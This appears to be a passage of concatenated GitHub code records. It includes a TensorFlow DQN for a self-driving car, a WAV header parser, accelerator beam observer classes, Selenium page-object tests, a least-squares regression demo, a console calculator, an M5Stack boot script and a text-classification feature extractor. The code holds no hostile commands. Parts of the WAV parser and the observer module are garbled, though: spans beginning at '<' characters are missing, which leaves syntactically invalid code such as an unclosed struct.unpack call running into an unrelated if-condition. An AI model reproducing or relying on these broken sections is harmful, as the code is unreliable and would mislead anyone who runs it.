name=\"h_fc1\")\n print(h_fc1)\n\n # Sixth (Output) layer is fully connected linear layer\n with tf.compat.v1.variable_scope(\"fc2_\" + name):\n W_fc2, b_fc2 = self.makeLayerVariables([256, numActions], trainable, \"fc2\")\n\n y = tf.matmul(h_fc1, W_fc2) + b_fc2\n print(y)\n \n return x, y\n\n def makeLayerVariables(self, shape, trainable, name_suffix):\n if self.normalizeWeights:\n # This is my best guess at what DeepMind does via torch's Linear.lua and SpatialConvolution.lua (see reset methods).\n # np.prod(shape[0:-1]) is attempting to get the total inputs to each node\n stdv = 1.0 / math.sqrt(np.prod(shape[0:-1]))\n weights = tf.Variable(tf.compat.v1.random_uniform(shape, minval=-stdv, maxval=stdv), trainable=trainable, name='W_' + name_suffix)\n biases = tf.Variable(tf.compat.v1.random_uniform([shape[-1]], minval=-stdv, maxval=stdv), trainable=trainable, name='W_' + name_suffix)\n else:\n weights = tf.Variable(tf.random.truncated_normal(shape, stddev=0.01), trainable=trainable, name='W_' + name_suffix)\n biases = tf.Variable(tf.fill([shape[-1]], 0.1), trainable=trainable, name='W_' + name_suffix)\n self.variable_summaries(weights)\n self.variable_summaries(biases)\n return weights, biases\n\n def variable_summaries(self, var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.compat.v1.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.compat.v1.summary.scalar('mean', mean)\n with tf.compat.v1.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.compat.v1.summary.scalar('stddev', stddev)\n tf.compat.v1.summary.scalar('max', tf.reduce_max(var))\n tf.compat.v1.summary.scalar('min', tf.reduce_min(var))\n tf.compat.v1.summary.histogram('histogram', var)\n \n def inference(self, screens):\n y = self.sess.run([self.y], {self.x: screens})\n q_values = np.squeeze(y)\n return np.argmax(q_values)\n \n def train(self, batch, stepNumber):\n\n x2 = [b.state2.getScreens() for b in batch]\n y2 = self.y_target.eval(feed_dict={self.x_target: x2}, session=self.sess)\n\n x = [b.state1.getScreens() for b in batch]\n a = np.zeros((len(batch), self.numActions))\n y_ = np.zeros(len(batch))\n \n for i in range(0, len(batch)):\n a[i, batch[i].action] = 1\n if batch[i].terminal:\n y_[i] = batch[i].reward\n else:\n y_[i] = batch[i].reward + self.gamma * np.max(y2[i])\n\n if stepNumber % self.tensorboardFrequency == 0:\n summary, _ = self.sess.run([self.merged, self.train_step], \n feed_dict={\n self.x: x,\n self.a: a,\n self.y_: y_\n })\n self.summary_writer.add_summary(summary, stepNumber)\n else:\n self.sess.run([self.train_step], \n feed_dict={\n self.x: x,\n self.a: a,\n self.y_: y_\n })\n\n if stepNumber % self.targetModelUpdateFrequency == 0:\n self.sess.run(self.update_target)\n\n if stepNumber % self.targetModelUpdateFrequency == 0 or stepNumber % self.saveModelFrequency == 0:\n dir = self.baseDir + '/models'\n if not os.path.isdir(dir):\n os.makedirs(dir)\n savedPath = self.saver.save(self.sess, dir + '/model.ckpt', global_step=stepNumber)\n","repo_name":"MichaelBosello/self-driving-car","sub_path":"self_driving_car/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":9664,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"27998148356","text":"'''\r\n# coding: utf-8\r\n2020.06.26: 在鹏飞的版本上进行了完善,把所有字段都提取出来。\r\n'''\r\n\r\nimport time\r\nimport wave\r\nimport numpy as np\r\nimport struct\r\nfrom scipy.fftpack import fft, ifft\r\nfrom scipy import signal, integrate\r\nfrom scipy.signal import hilbert, welch, stft\r\n\r\n\r\nclass WaveExtractor:\r\n def __init__(self):\r\n pass\r\n\r\n def waveInfoExtract(self, filepath):\r\n '''\r\n contributed by DaiFu 打开WAV文件,提取属性数据\r\n :param filepath: \r\n :return: \r\n '''\r\n file = open(filepath, \"rb\")\r\n file_dict = {}\r\n channel_columns = ['name', 'unit', 'amplification', 'offset']\r\n file_dict['filepath'] = filepath\r\n\r\n # RIFF ID\r\n file.seek(0, 0)\r\n RIFFID_bytes = file.read(4).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n file_dict['RIFFID'] = RIFFID_bytes\r\n # RIFFID = ''.join([bin(ord(c)).replace('0b', '') for c in RIFFID_bytes])\r\n\r\n # Size in bytes\r\n file.seek(4, 0)\r\n Size_In_Bytes = file.read(4)\r\n SizeInBytes = int.from_bytes(Size_In_Bytes, byteorder='little', signed=False)\r\n file_dict['SizeInBytes'] = SizeInBytes\r\n\r\n # WAVE ID\r\n file.seek(8, 0)\r\n WAVE_ID_bytes = file.read(4).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n # WAVE_ID = ''.join([bin(ord(c)).replace('0b', '') for c in WAVE_ID_bytes])\r\n file_dict['WAVE_ID'] = WAVE_ID_bytes\r\n\r\n # Format chunk ID\r\n file.seek(12, 0)\r\n Format_chunk_ID_bytes = file.read(4).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n # Format_chunk_ID = ''.join([bin(ord(c)).replace('0b', '') for c in Format_chunk_ID_bytes])\r\n file_dict['Format_chunk_ID'] = Format_chunk_ID_bytes\r\n\r\n # Format tag\r\n file.seek(20, 0)\r\n Format_tag_bytes = file.read(2).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n file_dict['Format_tag'] = Format_tag_bytes\r\n\r\n # 通道数\r\n file.seek(22, 0) # 表示从0开始,offset 22的位置开始读取数据\r\n Channels_number_bytes = file.read(2) ##表示读取多少个字节\r\n Channels_number = int.from_bytes(Channels_number_bytes, byteorder='little', signed=False) ##将二进制转换成数字\r\n print('Channels_number: ', Channels_number)\r\n file_dict['Channels_number'] = Channels_number\r\n\r\n # Samples per second\r\n file.seek(24, 0) # 表示从0开始,offset 22的位置开始读取数据\r\n Samples_per_second_bytes = file.read(4) ##表示读取多少个字节\r\n Samples_per_second = int.from_bytes(Samples_per_second_bytes, byteorder='little', signed=False) ##将二进制转换成数字\r\n file_dict['Samples_per_second'] = Samples_per_second\r\n\r\n # Block alignment\r\n file.seek(32, 0) # 表示从0开始,offset 22的位置开始读取数据\r\n Block_alignment_bytes = file.read(2) ##表示读取多少个字节\r\n Block_alignment = int.from_bytes(Block_alignment_bytes, byteorder='little', signed=False) ##将二进制转换成数字\r\n file_dict['Block_alignment'] = Block_alignment\r\n\r\n # CMS chunk ID\r\n file.seek(36, 0) # 表示从0开始,offset 22的位置开始读取数据\r\n CMS_chunk_ID_bytes = file.read(4).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode()) ##表示读取多少个字节\r\n # CMS_chunk_ID = ''.join([bin(ord(c)).replace('0b', '') for c in CMS_chunk_ID_bytes])\r\n file_dict['CMS_chunk_ID'] = CMS_chunk_ID_bytes\r\n\r\n # Device name\r\n file.seek(44, 0) # 表示从0开始,offset 22的位置开始读取数据\r\n Device_name_bytes = file.read(256).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode()) ##表示读取多少个字节\r\n # Device_name = bytes([int(x,2) for x in Device_name_bytes]).decode('utf-8')\r\n file_dict['Device_name'] = Device_name_bytes\r\n\r\n # 起始时间\r\n file.seek(300, 0)\r\n # pos=file.tell()\r\n Time_stamp_bytes = file.read(4)\r\n Time_stamp = int.from_bytes(Time_stamp_bytes, byteorder='little', signed=True)\r\n Time_array = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(Time_stamp))\r\n file_dict['Time_stamp'] = str(Time_stamp)\r\n\r\n if Channels_number >= 1:\r\n # Channel name 1\r\n file.seek(308, 0)\r\n Channel1_name = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n # Unit name 1\r\n file.seek(372, 0)\r\n Channel1_unit = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n # Amplification系数 1\r\n file.seek(436, 0)\r\n Channel1_amplification_bytes = file.read(4)\r\n Channel1_amplification = struct.unpack('= 2:\r\n # Channel name 2\r\n file.seek(444, 0)\r\n Channel2_name = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n # Unit name 2\r\n file.seek(508, 0)\r\n Channel2_unit = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n # Amplification系数 2\r\n file.seek(572, 0)\r\n Channel2_amplification_bytes = file.read(4)\r\n Channel2_amplification = struct.unpack('= 3:\r\n # Channel name 3\r\n file.seek(580, 0)\r\n Channel3_name = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n # Unit name 3\r\n file.seek(644, 0)\r\n Channel3_unit = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n # Amplification系数 3\r\n file.seek(708, 0)\r\n Channel3_amplification_bytes = file.read(4)\r\n Channel3_amplification = struct.unpack('= 4:\r\n # Channel name 4\r\n file.seek(716, 0)\r\n Channel4_name = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n # Unit name 4\r\n file.seek(780, 0)\r\n Channel4_unit = file.read(64).decode('UTF-8', 'ignore').strip().strip(b'\\x00'.decode())\r\n\r\n # Amplification系数 4\r\n file.seek(844, 0)\r\n Channel4_amplification_bytes = file.read(4)\r\n Channel4_amplification = struct.unpack(' _pd.DataFrame:\n return _pd.DataFrame(self.data, columns=self.headers).set_index(\"NAME\")\n\n\nclass BeamObserver(Observer):\n \"\"\"\n\n Return the beam distribution at the exit of an element. Optionnaly, return the beam at the entrance of the element.\n\n \"\"\"\n\n def __init__(self, elements: Optional[List[str]] = None, with_input_beams: bool = False):\n super().__init__(elements)\n self._with_input_beams = with_input_beams\n self.headers = (\n \"NAME\",\n \"AT_ENTRY\",\n \"AT_CENTER\",\n \"AT_EXIT\",\n \"BEAM_IN\",\n \"BEAM_OUT\",\n )\n\n def __call__(self, element, b1, b2):\n if super().__call__(element, b1, b2):\n self.data.append(\n (\n element.NAME,\n element.AT_ENTRY,\n element.AT_CENTER,\n element.AT_EXIT,\n _np.copy(b1) if self._with_input_beams else None,\n _np.copy(b2),\n ),\n )\n\n\nclass SuperObserver(Observer):\n def __init__(self, elements: Optional[List[str]] = None):\n super().__init__(elements)\n self.headers = (\n \"NAME\",\n \"AT_ENTRY\",\n \"AT_CENTER\",\n \"AT_EXIT\",\n )\n\n def __call__(self, element, b1, b2):\n if super().__call__(element, b1, b2):\n self.data.append((element.NAME, element.AT_ENTRY, element.AT_CENTER, element.AT_EXIT))\n\n\nclass MeanObserver(Observer):\n \"\"\"\n\n Compute the mean values of the beam coordinates.\n\n \"\"\"\n\n def __init__(self, elements: Optional[List[str]] = None):\n super().__init__(elements)\n self.headers = (\n \"NAME\",\n \"AT_ENTRY\",\n \"AT_CENTER\",\n \"AT_EXIT\",\n \"BEAM_IN_X\",\n \"BEAM_OUT_X\",\n \"BEAM_IN_Y\",\n \"BEAM_OUT_Y\",\n \"BEAM_IN_XP\",\n \"BEAM_OUT_XP\",\n \"BEAM_IN_YP\",\n \"BEAM_OUT_YP\",\n \"BEAM_IN_DPP\",\n \"BEAM_OUT_DPP\",\n )\n\n def __call__(self, element, b1, b2):\n if super().__call__(element, b1, b2):\n self.data.append(\n (\n element.NAME,\n element.AT_ENTRY,\n element.AT_CENTER,\n element.AT_EXIT,\n b1[:, 0].mean(),\n b2[:, 0].mean(),\n b1[:, 2].mean(),\n b2[:, 2].mean(),\n b1[:, 1].mean(),\n b2[:, 1].mean(),\n b1[:, 3].mean(),\n b2[:, 3].mean(),\n b1[:, 4].mean(),\n b2[:, 4].mean(),\n ),\n )\n\n\nclass SigmaObserver(Observer):\n \"\"\"\n\n Compute the standard deviation of the beam coordinates.\n\n \"\"\"\n\n def __init__(self, elements: Optional[List[str]] = None):\n super().__init__(elements)\n self.headers = (\n \"NAME\",\n \"AT_ENTRY\",\n \"AT_CENTER\",\n \"AT_EXIT\",\n \"BEAM_IN_X\",\n \"BEAM_OUT_X\",\n \"BEAM_IN_Y\",\n \"BEAM_OUT_Y\",\n \"BEAM_IN_XP\",\n \"BEAM_OUT_XP\",\n \"BEAM_IN_YP\",\n \"BEAM_OUT_YP\",\n \"BEAM_IN_DPP\",\n \"BEAM_OUT_DPP\",\n )\n\n def __call__(self, element, b1, b2):\n if super().__call__(element, b1, b2):\n self.data.append(\n (\n element.NAME,\n element.AT_ENTRY,\n element.AT_CENTER,\n element.AT_EXIT,\n b1[:, 0].std(),\n b2[:, 0].std(),\n b1[:, 2].std(),\n b2[:, 2].std(),\n b1[:, 1].std(),\n b2[:, 1].std(),\n b1[:, 3].std(),\n b2[:, 3].std(),\n b1[:, 4].std(),\n b2[:, 4].std(),\n ),\n )\n\n\nclass LossesObserver(Observer):\n \"\"\"\n\n Compute the losses and the transmission in an element.\n\n \"\"\"\n\n def __init__(self, elements: Optional[List[str]] = None):\n super().__init__(elements)\n self.headers = (\n \"NAME\",\n \"AT_ENTRY\",\n \"AT_CENTER\",\n \"AT_EXIT\",\n \"PARTICLES_IN\",\n \"PARTICLES_OUT\",\n \"TRANSMISSION\",\n \"LOSSES\",\n )\n\n def __call__(self, element, b1, b2):\n if super().__call__(element, b1, b2):\n self.data.append(\n (\n element.NAME,\n element.AT_ENTRY,\n element.AT_CENTER,\n element.AT_EXIT,\n b1.shape[0],\n b2.shape[0],\n 100 * (b2.shape[0] / b1.shape[0]),\n 100 * (1 - b2.shape[0] / b1.shape[0]),\n ),\n )\n\n def compute_global_transmission(self, global_transmission: float = 1.0):\n for elem in self.data:\n global_transmission *= elem[3] / 100\n return global_transmission * 100\n\n def compute_global_losses(self):\n return 100 - self.compute_global_transmission()\n\n # def adjust_for_efficiency(self, efficiency: float = 1.0):\n # do something with self.data\n # self.data['LOSSES'] /= efficiency\n # self.data['TRANSMISSION'] *= effiency\n # ...\n\n\nclass SymmetryObserver(Observer):\n \"\"\"\n\n Compute the symmetry of the beam.\n\n \"\"\"\n\n def __init__(self, elements: Optional[List[str]] = None):\n super().__init__(elements=elements)\n\n self.headers = (\n \"NAME\",\n \"AT_ENTRY\",\n \"AT_CENTER\",\n \"AT_EXIT\",\n \"SYM_IN\",\n \"SYM_OUT\",\n )\n\n def __call__(self, element, b1, b2):\n self.data.append(\n (\n element.NAME,\n element.AT_ENTRY,\n element.AT_CENTER,\n element.AT_EXIT,\n abs(b1[:, 0].std() - b1[:, 2].std()) / (b1[:, 0].std() + b1[:, 2].std()),\n abs(b2[:, 0].std() - b2[:, 2].std()) / (b2[:, 0].std() + b2[:, 2].std()),\n ),\n )\n\n\nclass TwissObserver(Observer):\n\n \"\"\"\n\n Compute the Twiss parameters of the beam.\n\n \"\"\"\n\n def __init__(self, elements=None):\n super().__init__(elements)\n self.headers = (\n \"NAME\",\n \"AT_ENTRY\",\n \"AT_CENTER\",\n \"AT_EXIT\",\n \"EMIT_IN_X\",\n \"EMIT_OUT_X\",\n \"BETA_IN_X\",\n \"BETA_OUT_X\",\n \"ALPHA_IN_X\",\n \"ALPHA_OUT_X\",\n \"DISP_IN_X\",\n \"DISP_OUT_X\",\n \"DISP_IN_XP\",\n \"DISP_OUT_XP\",\n \"EMIT_IN_Y\",\n \"EMIT_OUT_Y\",\n \"BETA_IN_Y\",\n \"BETA_OUT_Y\",\n \"ALPHA_IN_Y\",\n \"ALPHA_OUT_Y\",\n \"DISP_IN_Y\",\n \"DISP_OUT_Y\",\n \"DISP_IN_YP\",\n \"DISP_OUT_YP\",\n )\n\n def __call__(self, element, b1, b2):\n if super().__call__(element, b1, b2):\n # Do not use distribution but directly use numpy with numba\n twiss_in = Distribution.compute_twiss(b1)\n twiss_out = Distribution.compute_twiss(b2)\n\n self.data.append(\n (\n element.NAME,\n element.AT_ENTRY,\n element.AT_CENTER,\n element.AT_EXIT,\n twiss_in[0],\n twiss_out[0],\n twiss_in[1],\n twiss_out[1],\n twiss_in[2],\n twiss_out[2],\n twiss_in[3],\n twiss_out[3],\n twiss_in[4],\n twiss_out[4],\n twiss_in[5],\n twiss_out[5],\n twiss_in[6],\n twiss_out[6],\n twiss_in[7],\n twiss_out[7],\n twiss_in[8],\n twiss_out[8],\n twiss_in[9],\n twiss_out[9],\n ),\n )\n\n\nclass IbaBpmObserver(Observer):\n def __init__(self, elements: Optional[List[str]] = None):\n super().__init__(elements)\n self.headers = (\n \"NAME\",\n \"AT_ENTRY\",\n \"AT_CENTER\",\n \"AT_EXIT\",\n \"BEAM_OUT_X\",\n \"BEAM_OUT_Y\",\n )\n\n @staticmethod\n def fit_bpm(distribution: _np.array):\n @njit\n def gaussian(x, a, mu, sigma):\n return a * _np.exp(-((x - mu) ** 2) / (2 * sigma**2)) / (_np.sqrt(2 * _np.pi) * sigma)\n\n def fit_bpm(d, maxfev=1e7):\n bs = (\n _np.array(\n [\n -31,\n -19.8,\n -15.8,\n -11.8,\n -7.8,\n -5.8,\n -3.8,\n -1.8,\n 0.0,\n 1.8,\n 3.8,\n 5.8,\n 7.8,\n 11.8,\n 15.8,\n 19.8,\n 31,\n ],\n )\n / 1000\n )\n bsp = (bs[1:] + bs[:-1]) / 2\n w = 1.0 / (bs[1:] - bs[:-1])\n w[0] *= 0.7\n w[-1] *= 0.7\n hist = _np.histogram(d, bs)\n x = bsp\n y = w * hist[0]\n ar = _np.trapz(y / _np.sum(y) * len(y), x)\n mean = _np.mean(x * y / _np.sum(y) * len(y))\n rms = _np.std(x * y / _np.sum(y) * len(y))\n\n params = Parameters() # Instanciate the Parameters class, then add variables as keywords\n params.add(\"a\", value=ar, min=-1e6, max=1e6)\n params.add(\"mu\", value=mean, min=mean - _np.abs(mean), max=mean + _np.abs(mean))\n params.add(\"sigma\", value=rms, min=0.5 * rms, max=2 * rms)\n params.add(\"max_nfev\", value=maxfev)\n\n gmodel = Model(gaussian)\n result = gmodel.fit(\n data=y,\n x=x,\n params=params,\n )\n\n # Print the fit result\n print(\"bpm fit result:\", result.best_values[\"a\"], result.best_values[\"mu\"], result.best_values[\"sigma\"])\n return [result.best_values[\"sigma\"]]\n\n return fit_bpm(distribution)\n\n def __call__(self, element, b1, b2):\n if super().__call__(element, b1, b2) and element.CLASS == \"Marker\":\n print(element.NAME) # To identify the BPM whose data are being fitted\n self.data.append(\n (\n element.NAME,\n element.AT_ENTRY,\n element.AT_CENTER,\n element.AT_EXIT,\n self.fit_bpm(b2[:, 0])[0],\n self.fit_bpm(b2[:, 2])[0],\n ),\n )\n","repo_name":"ULB-Metronu/georges","sub_path":"georges/manzoni/observers.py","file_name":"observers.py","file_ext":"py","file_size_in_byte":11774,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"29489320203","text":"from common.front_end_test_case import FrontEndTestCase\nfrom businessCommon.pages.login_page import EtownLoginPage, MyPage\nfrom businessCommon.pages.create_account_page import CreateAccountPage\n\n\nclass MyPageOpenedCheck(FrontEndTestCase):\n\n def runTest(self):\n username = CreateAccountPage(self.driver).activate_account()\n EtownLoginPage(self.driver).log_in(username)\n MyPage(self.driver).mypage_check()\n\nif __name__ == '__main__':\n MyPageOpenedCheck().runTest()","repo_name":"hongbaby/webAutomation","sub_path":"cases/Etown_Smoke_test_cases/my_page_opened_check.py","file_name":"my_page_opened_check.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34624021927","text":"from src.pages.distributor.distributor_portal_page import DistributorPortalPage\nfrom src.pages.locator import Locator as L\nfrom src.resources.tools import Tools\n\nclass VmiPage(DistributorPortalPage):\n location_body = {\n \"sku\": None,\n \"orderingConfig.currentInventoryControls.min\": None,\n \"orderingConfig.currentInventoryControls.max\": None,\n \"attributeName1\": None,\n \"attributeValue1\": None,\n \"customerSku\": None,\n \"type\": None\n }\n xpath_button_bulk_operations = f\"{L.button_type}//span[text()='Bulk operations']\"\n\n def follow_location_url(self, customer_id=None, shipto_id=None):\n if customer_id is None:\n customer_id = self.data.customer_id\n if shipto_id is None:\n shipto_id = self.data.shipto_id\n self.follow_url(f\"{self.url.distributor_portal}/customers/{customer_id}/shiptos/{shipto_id}#vmi-list\")\n\n def create_location(self, location_body):\n self.element(L.add_button).click()\n self.select_in_dropdown_via_input(L.get_dropdown_in_dialog(1), location_body.pop(\"sku\"), span=True)\n for field in location_body.keys():\n self.input_by_name(field, location_body[field])\n self.element(L.submit_button).click()\n self.dialog_should_not_be_visible()\n\n def check_last_location(self, location_body):\n self.open_last_page()\n table_cells = {\n \"Distributor SKU\": location_body[\"sku\"],\n }\n for cell, value in table_cells.items():\n self.check_last_table_item_outdated(cell, value)\n\n def import_location(self, locations):\n Tools.generate_csv(\"locations.csv\", locations)\n self.element(L.item_action_import).click()\n self.import_csv(L.file_upload, \"locations.csv\")\n self.element(L.successfully_imported_msg).get()\n","repo_name":"fisher1706/ilx","sub_path":"src/pages/distributor/vmi_page.py","file_name":"vmi_page.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5583397870","text":"#!/usr/bin/python\n# -*- encoding:utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# 机器学习算法:线性回归--最小二乘法\ndef least_squares(data):\n # 1. 导入数据(data.csv), 返回一个二维数组\n points = np.genfromtxt(data, delimiter=',')\n # 提取points中的两列数据,分别作为x, y\n # print(points)\n # 取出所有的x\n xn = points[:, 0]\n # 取出所有的y\n yn = points[:, 1]\n # 绘制x, y的散点图\n plt.scatter(xn, yn)\n plt.show()\n # 通过拟合函数计算损失函数系数\n w, b = fit(points)\n print(\"w = \", w)\n print(\"b = \", b)\n print(\"cost = \", compute_cost(w, b, points))\n # 画出拟合曲线,plot是点图\n plt.scatter(xn, yn)\n # 针对每一个x计算出预测的y值\n pred_y = w * xn + b\n plt.plot(xn, pred_y, c='red')\n plt.show()\n\n\ndef compute_cost(w, b, points):\n \"\"\"\n 损失函数:损失函数是系数的函数, 公式:(y - wx -b) ** 2 再对每个点的损失求和\n :param w: x的系数\n :param b: 常量\n :param points: 数据源\n :return:\n \"\"\"\n # 每个点的损失和\n total_cost = 0\n # 点的总数\n m = len(points)\n # 逐点计算平方损失误差,然后求平均数\n for i in range(m):\n x = points[i, 0]\n y = points[i, 1]\n total_cost += (y - w * x - b) ** 2\n\n return total_cost/m\n\n\ndef average(data):\n \"\"\"\n 求平均值\n :param data: 数据\n :return: 平均值\n \"\"\"\n sum_data = 0\n m = len(data)\n for i in range(m):\n sum_data += data[i]\n\n return sum_data/m\n\n\ndef fit(points):\n \"\"\"\n 核心拟合函数,官方定义的方法名都是fit\n 通过拟合函数计算出损失函数系数\n :param points: 数据\n :return: w, b\n \"\"\"\n # 求和总次数\n m = len(points)\n # x的平均值\n x_avg = average(points[:, 0])\n # 计算w, b\n sum_yx = 0\n sum_xx = 0\n for i in range(m):\n x = points[i, 0]\n y = points[i, 1]\n # 对 y * (x - x_avg)求和\n sum_yx += y * (x - x_avg)\n # 对 x的平方求和\n sum_xx += x ** 2\n\n # 计算w的值\n w = sum_yx / (sum_xx - m * (x_avg ** 2))\n # 计算b的值\n sum_ywx = 0\n for i in range(m):\n x = points[i, 0]\n y = points[i, 1]\n sum_ywx += y - w * x\n\n b = sum_ywx / m\n return w, b\n\n\nif __name__ == '__main__':\n least_squares('D:/Learn/Workspace/Python/machine-learning/src/data/data.csv')\n","repo_name":"xiaoqiangjava/machine-learning","sub_path":"src/linear-regression/least-squares.py","file_name":"least-squares.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"4325965376","text":"menu_variants = ('1', '2', '3', '4', '5')\nhistory = []\nprint('Skaičiuotuvas\\n')\nwhile True:\n print('1. Sudėtis \\n'\n '2. Atimtis \\n'\n '3. Daugyba \\n'\n '4. Dalyba \\n'\n '5. Atspausdinti skaičių seką nuo x iki y \\n'\n 'Baigti darbą - q')\n print('*' * 30)\n selection = input('>>>> ')\n\n if selection == 'q':\n print('Atliktų veiksmų istorija: \\n')\n for el in history:\n if type(el) == list:\n print(*el)\n else:\n print(el)\n break\n\n if not selection in menu_variants:\n print('Tokio pasirinkimo nėra..')\n print('*' * 30)\n continue\n\n x = float(input('Įveskite pirmą skaičių: '))\n y = float(input('Įveskite antrą skaičių: '))\n x_int_check = int(x) if x.is_integer() else x\n y_int_check = int(y) if y.is_integer() else y\n\n if selection == '1':\n res = x + y\n res_int_check = int(res) if res.is_integer() else res\n res_string = f'{x_int_check} + {y_int_check} = {res_int_check}'\n print(res_string)\n history.append(res_string)\n print('*' * 30)\n\n elif selection == '2':\n res = x - y\n res_int_check = int(res) if res.is_integer() else res\n res_string = f'{x_int_check} - {y_int_check} = {res_int_check}'\n print(res_string)\n history.append(res_string)\n print('*' * 30)\n\n elif selection == '3':\n res = x * y\n res_int_check = int(res) if res.is_integer() else res\n res_string = f'{x_int_check} * {y_int_check} = {res_int_check}'\n print(res_string)\n history.append(res_string)\n print('*' * 30)\n\n elif selection == '4':\n res = x / y\n res_int_check = int(res) if res.is_integer() else res\n res_string = f'{x_int_check} / {y_int_check} = {res_int_check}'\n print(res_string)\n history.append(res_string)\n print('*' * 30)\n\n elif selection == '5':\n range_l = []\n x = int(x)\n y = int(y)\n if x > y:\n\n for sk in range(x, y - 1, -1):\n range_l.append(sk)\n print(sk, end=' ')\n history.append(range_l)\n print('\\n', '*' * 30)\n\n else:\n for sk in range(x, y + 1):\n range_l.append(sk)\n print(sk, end=' ')\n history.append(range_l)\n print('\\n', '*' * 30)\n","repo_name":"TomasKrin/PTU18git","sub_path":"kalkuliatorius.py","file_name":"kalkuliatorius.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"lt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31757157117","text":"import machine,os,ujson,sys,time\n\n\nprint('Booting..')\n\nsys.path.append('/flash/libs')\nsys.path.append('flowlib/lib')\n\nfrom m5stack import *\nimport menu as mnu\nimport helper as hp\nimport custbutton as btn\nconfig = {}\nwith open('config.cfg','r') as configFile:\n config = ujson.load(configFile)\n\nbuttonA = machine.Pin(37, machine.Pin.IN)\nbuttonB = machine.Pin(39, machine.Pin.IN)\n\nM5Led.on()\ntime.sleep(2)\nM5Led.off()\n\n\ndef configWiFi():\n\tlcd.clear(lcd.BLACK)\n\tlcd.text(lcd.CENTER,30,'192.168.4.1')\n\timport wifiConfig\n\twifiConfig.setupWifi()\n\t\n\treturn 1\ndef configUSB():\n\tlcd.clear(lcd.BLACK)\n\tlcd.text(lcd.CENTER,lcd.CENTER,'Enter config using serial\\nport.\\nhp.setPara(key,value)')\n\treturn 1\n\ndef configKeyCard():\n\tpass\n\ndef debugMenu():\n\treturn 1\n\n\nif buttonA.value() == 0:\n import main_menu\nelif buttonB.value()==0:\n\tsettingMenu = mnu.Menu(hp.tft,btn,header='Settings',landscape=True)\n\tsettingMenu.addMenuItem('Setup WiFi',configWiFi)\n\tsettingMenu.addMenuItem('Configure Using USB',configUSB)\n\tsettingMenu.addMenuItem('Configure Using Key Card',configKeyCard)\n\tsettingMenu.addMenuItem('Debug Menu',debugMenu)\n\tsettingMenu.run()\nelse:\n os.chdir('apps/'+config['apps']['defaultApp'])\n import main","repo_name":"neoxharsh/M5Stack-Application-Platform-Micropython","sub_path":"boot.py","file_name":"boot.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"629558431","text":"from HTMLextractor_helper import corpus_reader\nfrom feature_extraction_helper import load_dataset, get_feature_dict\nfrom zipfile import ZipFile\nfrom tqdm import tqdm\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.tree import DecisionTreeClassifier\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import randint\nfrom sklearn.tree import export_graphviz\nimport re\nfrom nltk.corpus import stopwords, brown, words, webtext\nimport string\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import tree\n\nZIP_FILEPATH = \"lang-8.zip\"\nTRAIN_FILEPATH = \"train.txt\"\nDEV_FILEPATH = \"dev.txt\"\nTEST_FILEPATH = \"test.txt\"\n\nASIAN_LANG = [\"Korean\", \"Japanese\", \"Mandarin\"]\n\n\ndef split_dataset_and_extract_features(train_data, dev_data, test_data, filepath):\n \"\"\"Split the dataset from the given filepath and extract featrues for trainining data, development data and test data\n\n Args:\n train_set (list): List of filenames in training set\n dev_set (list): List of filenames in dev set\n test_set (list): List of filenames in test set\n filepath (str): a path to the zip file\n\n Returns:\n Tuple of list: A tuple of list of feature dicts which extracted from zip file for each set\n \"\"\"\n X_train, y_train = [], []\n X_dev, y_dev = [], []\n X_test, y_test = [], []\n\n my_zip = ZipFile(filepath)\n corpus_generator = corpus_reader(my_zip)\n ALL_TEXT = \"\"\n for doc, native_lang, body_text in tqdm(corpus_generator):\n if native_lang == \"Russian\":\n continue\n feature_dict = get_feature_dict(body_text)\n\n if doc in train_set:\n X_train.append(feature_dict)\n if native_lang in ASIAN_LANG:\n y_train.append(\"Asian\")\n else:\n y_train.append(\"European\")\n\n if doc in dev_set:\n X_dev.append(feature_dict)\n if native_lang in ASIAN_LANG:\n y_dev.append(\"Asian\")\n else:\n y_dev.append(\"European\")\n\n if doc in test_set:\n X_test.append(feature_dict)\n if native_lang in ASIAN_LANG:\n y_test.append(\"Asian\")\n else:\n y_test.append(\"European\")\n\n my_zip.close()\n return X_train, 